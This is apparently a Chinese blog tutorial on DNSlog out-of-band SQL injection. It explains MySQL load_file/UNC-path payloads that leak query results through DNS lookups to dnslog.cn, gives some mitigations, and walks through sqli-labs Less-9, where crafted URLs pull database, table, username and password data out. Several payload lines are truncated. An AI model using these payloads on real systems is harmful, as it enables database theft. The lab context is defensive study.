当时我蒙了#xff0c;确实没听说过这个东西#xff0c;然后面试官告诉我原来dnslog注入…

前言什么是UNC什么是DNSlog注入DNSlog注入的条件防止DNSlog注入的几个措施

sqli-labs试验

当时我蒙了确实没听说过这个东西然后面试官告诉我原来dnslog注入就是带外通信的一种。

UNCUniversal

Convention路径是用于在计算机网络中标识资源位置的标准格式。

它通常用于访问共享文件夹或打印机等网络资源。

UNC路径格式的一般结构如下

\\server\share\path\filename\\:

DNSlog注入是一种利用DNS服务器记录域名解析请求的特性来获取SQL注入结果的技术。

它的原理是通过构造一个包含数据库信息的子域名然后使用MySQL的load_file函数或其他方法让目标服务器向DNS服务器发起解析请求从而在DNS服务器上留下注入结果的痕迹。

DNSlog注入的应用场景是当网站对于SQL注入的攻击没有回显或者过滤了敏感的回显内容时可以使用DNSlog注入来绕过这些限制获取数据库的信息。

首先需要一个可以记录DNS请求的平台例如dnslog.cn和ceye.io。

在这个平台上可以获取一个专属的子域名例如xxx.dnslog.cn并且可以查看该子域名下所有的DNS请求记录。

然后需要构造一个包含数据库信息的子域名例如(select

database()).xxx.dnslog.cn。

这个子域名可以使用MySQL的函数或者操作符来拼接例如concat、replace、substr等。

接着需要使用MySQL的load_file函数或其他方法让目标服务器向DNS服务器发起解析请求。

例如使用以下语句

select

load_file(concat(‘\\\\’,(select

database()),‘.xxx.dnslog.cn/abc’));这个语句会让目标服务器尝试从(select

database()).xxx.dnslog.cn/abc这个地址加载文件从而触发DNS解析请求。

最后需要在DNSlog平台上查看DNS请求记录就可以获取数据库信息了。

例如在上面的例子中如果数据库名为security那么就会看到security.xxx.dnslog.cn这样的记录。

由于每一级域名的长度只能为63个字符所以在MySQL中获取到超过63个字节的字符时会被当作一个错误的域名不会产生去解析的动作。

所以需要控制查询结果的字符长度在63个以内。

由于URL中传递的字符非常有限很多特殊字符如{,},!,等是无法传递的。

这就会导致load_file函数失效。

所以需要对查询结果进行hex编码然后再使用16进制解码网站来还原结果。

目标服务器可以执行一些函数或命令如load_file、exec、curl等用于向DNS服务器发送域名查询。

攻击者拥有一个自己的域名并能够配置NS记录和获取DNS日志用于接收目标服务器发送的域名查询信息。

目标服务器返回的数据不超过域名长度限制63个字符并且不包含特殊符号否则会导致DNS查询失败。

限制目标服务器对外部网络的访问权限禁止或过滤掉不必要的DNS请求。

对目标服务器执行的函数或命令进行严格的输入验证和过滤防止攻击者注入恶意的域名或URL。

my.ini中secure_file_priv值设置为null

sqli-labs试验

http://192.168.171.30/sqli/Less-9/?id-1

and

database()),.20vice.dnslog.cn/test)))--成功回显了数据

接下来查一下库里的表名这里用limit限制只回显一个数据多次查询

http://192.168.171.30/sqli/Less-9/?id-1

and

3,1),.20vice.dnslog.cn/test)))--看到了四个表

http://192.168.171.30/sqli/Less-9/?id-1

and

0,1),.20vice.dnslog.cn/test)))--尝试读取一下用户名数据

http://192.168.171.30/sqli/Less-9/?id-1

and

2,1),.nwpxcq.dnslog.cn/test)))--再读取一下密码由于密码里可能有特殊字符这里进行十六进制编码了

http://192.168.171.30/sqli/Less-9/?id-1

and

usernameDummy),.nwpxcq.dnslog.cn/test)))--十六进制解码成功获取数据